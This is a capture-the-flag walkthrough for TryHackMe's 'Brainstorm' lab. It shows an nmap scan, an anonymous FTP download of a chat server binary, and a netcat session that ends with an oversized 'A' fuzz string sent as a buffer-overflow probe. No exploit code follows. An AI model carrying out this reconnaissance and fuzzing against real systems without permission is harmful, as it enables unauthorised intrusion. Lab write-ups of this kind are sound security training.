Brainstorm - tryhackme walkthrough

Vamsi Krishna C V

System Engineer at Leonteq Security Solution, GMBH

发布日期: 2023年2月8日

nmap scan

┌──(root??kali)-[~]
└─# nmap -T4 -p- -A -Pn 10.10.53.141
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( [<https://nmap.org>](<https://nmap.org/>) ) at 2023-02-06 11:06 EST
Stats: 0:02:57 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 42.52% done; ETC: 11:13 (0:03:59 remaining)
Stats: 0:04:38 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 65.24% done; ETC: 11:13 (0:02:28 remaining)
Stats: 0:08:42 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 66.67% done; ETC: 11:15 (0:01:00 remaining)
Stats: 0:09:56 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.76% done; ETC: 11:16 (0:00:00 remaining)
Nmap scan report for 10.10.46.59
Host is up (0.39s latency).
Not shown: 65532 filtered ports
PORT     STATE SERVICE            VERSION
**21/tcp   open  ftp                Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)**
|*Can't get directory listing: TIMEOUT*
| ftp-syst:
**|  SYST: Windows_NT
**3389/tcp open  ssl/ms-wbt-server?**
| ssl-cert: Subject: commonName=brainstorm
| Not valid before: 2023-02-05T16:05:53
|_Not valid after:  2023-08-07T16:05:53
|*ssl-date: 2023-02-06T16:16:24+00:00; +1s from scanner time.
**9999/tcp open  abyss?***
| fingerprint-strings:
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, RPCCheck, RTSPRequest, SSLSessionReq, TerminalServerCookie:
|     Welcome to Brainstorm chat (beta)
|     Please enter your username (max 20 characters): Write a message:
|   NULL:|     Welcome to Brainstorm chat (beta)
|    Please enter your username (max 20 characters):
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at [<https://nmap.org/cgi-bin/submit.cgi?new-service>](<https://nmap.org/cgi-bin/submit.cgi?new-service>) :
SF-Port9999-TCP:V=7.91%I=7%D=2/6%Time=63E12709%P=x86_64-pc-linux-gnu%r(NUL
SF:L,52,"Welcome\\x20to\\x20Brainstorm\\x20chat\\x20\\(beta\\)\\nPlease\\x20enter\\
SF:x20your\\x20username\\x20\\(max\\x2020\\x20characters\\):\\x20")%r(GetRequest,
SF:63,"Welcome\\x20to\\x20Brainstorm\\x20chat\\x20\\(beta\\)\\nPlease\\x20enter\\x2
SF:0your\\x20username\\x20\\(max\\x2020\\x20characters\\):\\x20Write\\x20a\\x20mess
SF:age:\\x20")%r(HTTPOptions,63,"Welcome\\x20to\\x20Brainstorm\\x20chat\\x20\\(b
SF:eta\\)\\nPlease\\x20enter\\x20your\\x20username\\x20\\(max\\x2020\\x20characters
SF:\\):\\x20Write\\x20a\\x20message:\\x20")%r(FourOhFourRequest,63,"Welcome\\x20
SF:to\\x20Brainstorm\\x20chat\\x20\\(beta\\)\\nPlease\\x20enter\\x20your\\x20userna
SF:me\\x20\\(max\\x2020\\x20characters\\):\\x20Write\\x20a\\x20message:\\x20")%r(Ja
SF:vaRMI,63,"Welcome\\x20to\\x20Brainstorm\\x20chat\\x20\\(beta\\)\\nPlease\\x20en
SF:ter\\x20your\\x20username\\x20\\(max\\x2020\\x20characters\\):\\x20Write\\x20a\\x
SF:20message:\\x20")%r(GenericLines,63,"Welcome\\x20to\\x20Brainstorm\\x20chat
SF:\\x20\\(beta\\)\\nPlease\\x20enter\\x20your\\x20username\\x20\\(max\\x2020\\x20cha
SF:racters\\):\\x20Write\\x20a\\x20message:\\x20")%r(RTSPRequest,63,"Welcome\\x2
SF:0to\\x20Brainstorm\\x20chat\\x20\\(beta\\)\\nPlease\\x20enter\\x20your\\x20usern
SF:ame\\x20\\(max\\x2020\\x20characters\\):\\x20Write\\x20a\\x20message:\\x20")%r(R
SF:PCCheck,63,"Welcome\\x20to\\x20Brainstorm\\x20chat\\x20\\(beta\\)\\nPlease\\x20
SF:enter\\x20your\\x20username\\x20\\(max\\x2020\\x20characters\\):\\x20Write\\x20a
SF:\\x20message:\\x20")%r(DNSVersionBindReqTCP,63,"Welcome\\x20to\\x20Brainsto
SF:rm\\x20chat\\x20\\(beta\\)\\nPlease\\x20enter\\x20your\\x20username\\x20\\(max\\x2
SF:020\\x20characters\\):\\x20Write\\x20a\\x20message:\\x20")%r(DNSStatusRequest
SF:TCP,63,"Welcome\\x20to\\x20Brainstorm\\x20chat\\x20\\(beta\\)\\nPlease\\x20ente
SF:r\\x20your\\x20username\\x20\\(max\\x2020\\x20characters\\):\\x20Write\\x20a\\x20
SF:message:\\x20")%r(Help,63,"Welcome\\x20to\\x20Brainstorm\\x20chat\\x20\\(beta
SF:\\)\\nPlease\\x20enter\\x20your\\x20username\\x20\\(max\\x2020\\x20characters\\):
SF:\\x20Write\\x20a\\x20message:\\x20")%r(SSLSessionReq,63,"Welcome\\x20to\\x20B
SF:rainstorm\\x20chat\\x20\\(beta\\)\\nPlease\\x20enter\\x20your\\x20username\\x20\\
SF:(max\\x2020\\x20characters\\):\\x20Write\\x20a\\x20message:\\x20")%r(TerminalS
SF:erverCookie,63,"Welcome\\x20to\\x20Brainstorm\\x20chat\\x20\\(beta\\)\\nPlease
SF:\\x20enter\\x20your\\x20username\\x20\\(max\\x2020\\x20characters\\):\\x20Write\\
SF:x20a\\x20message:\\x20");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2008 R2 SP1 (90%), Microsoft Windows Server 2008 (90%), Microsoft Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 R2 or Windows 8 (90%), Microsoft Windows 7 SP1 (90%), Microsoft Windows 8.1 Update 1 (90%), Microsoft Windows Phone 7.5 or 8.0 (90%), Microsoft Windows 7 or Windows Server 2008 R2 (89%), Microsoft Windows Server 2008 or 2008 Beta 3 (89%), Microsoft Windows Server 2008 R2 or Windows 8.1 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 4 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
TRACEROUTE (using port 21/tcp)
HOP RTT       ADDRESS
1   262.72 ms 10.2.0.1
2   ... 3
4   390.45 ms 10.10.46.59
OS and Service detection performed. Please report any incorrect results at [<https://nmap.org/submit/>](<https://nmap.org/submit/>) .
Nmap done: 1 IP address (1 host up) scanned in 619.30 seconds

?? Open Ports:

21/tcp open ftp Microsoft ftpd

3389/tcp open ssl/ms-wbt-server?

9999/tcp open abyss?

?? ftp:

Anonymous login is allowed.

Anonymous Login

┌──(root??kali)-[~]
└─# ftp 10.10.53.141
Connected to 10.10.46.59.
220 Microsoft FTP Service
Name (10.10.46.59:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection.
08-29-19  07:36PM       <DIR>          chatserver
226 Transfer complete.
ftp> cd chatserver
250 CWD command successful.
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection.
08-29-19  09:26PM                43747 chatserver.exe
08-29-19  09:27PM                30761 essfunc.dll
226 Transfer complete.
ftp> binary
200 Type set to I.
ftp> mget **.**
mget chatserver.exe? y
200 PORT command successful.
150 Opening BINARY mode data connection.
226 Transfer complete.
43747 bytes received in 1.98 secs (21.5736 kB/s)
mget essfunc.dll? y
200 PORT command successful.
150 Opening BINARY mode data connection.
226 Transfer complete.
30761 bytes received in 1.58 secs (19.0279 kB/s)
ftp> bye
221 Goodbye.

How does the exe work:

chatserver.exe is listening on port 9999 for connections.

The exe and the .dll are copied to another Windows 7 machine where Immunity Debugger is installed.

┌──(root??kali)-[~/Buffer Overflow/thmbfprep/brainstorm/chatserver]
└─# nc -nv 192.168.57.11 9999
(UNKNOWN) [192.168.57.11] 9999 (?) open
Welcome to Brainstorm chat (beta)
Please enter your username (max 20 characters): ffff
Write a message: ffffffffffffff
Tue Feb 07 13:09:09 2023
ffff said: ffffffffffffff
Write a message:

Two inputs could be provided to the chatserver.exe.

username
message

Fuzzing:

┌──(root??kali)-[~/Buffer Overflow/thmbfprep/brainstorm/chatserver]
└─# nc -nv 192.168.57.11 9999
(UNKNOWN) [192.168.57.11] 9999 (?) open
Welcome to Brainstorm chat (beta)
Please enter your username (max 20 characters): AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

